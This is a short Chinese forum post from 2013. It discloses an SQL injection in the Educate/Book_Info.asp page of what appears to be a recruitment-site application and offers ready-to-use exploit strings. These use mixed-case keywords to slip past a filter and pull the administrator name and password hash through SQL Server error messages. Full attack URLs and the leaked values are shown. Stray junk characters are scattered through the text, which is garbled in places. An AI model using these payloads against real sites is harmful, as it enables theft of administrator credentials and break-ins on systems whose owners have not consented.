漏洞出现在Educate/Book_Info.asp
4 a& s' f+ p4 y9 ~此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出 |& a. M: X! K
exp:如下
; E6 l% K G3 n' E, {查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)4 s8 E z+ J# B( N z2 q5 X
查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
4 R0 g: L, `4 w+ P" Mhttp://jobs.0day5.com/Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper). L, E% j3 [2 D* z
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'5 Y" W/ u- I4 p ]" O; H( j
将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。
) J) x# |5 f& u- ?" k, _/Educate/Book_Info.asp,行 84 i7 \1 X8 w) `
http://jobs.0day5.com/Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
4 |" P: L- n8 o$ S7 ~$ kMicrosoft OLE DB Provider for SQL Server 错误 '80040e07'1 ]" Y" t( k/ X! p# Q
将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。/ D, i5 y$ `: h+ {
/Educate/Book_Info.asp,行 8 |
发表于 2013-2-13 23:56:06
收藏
支持
反对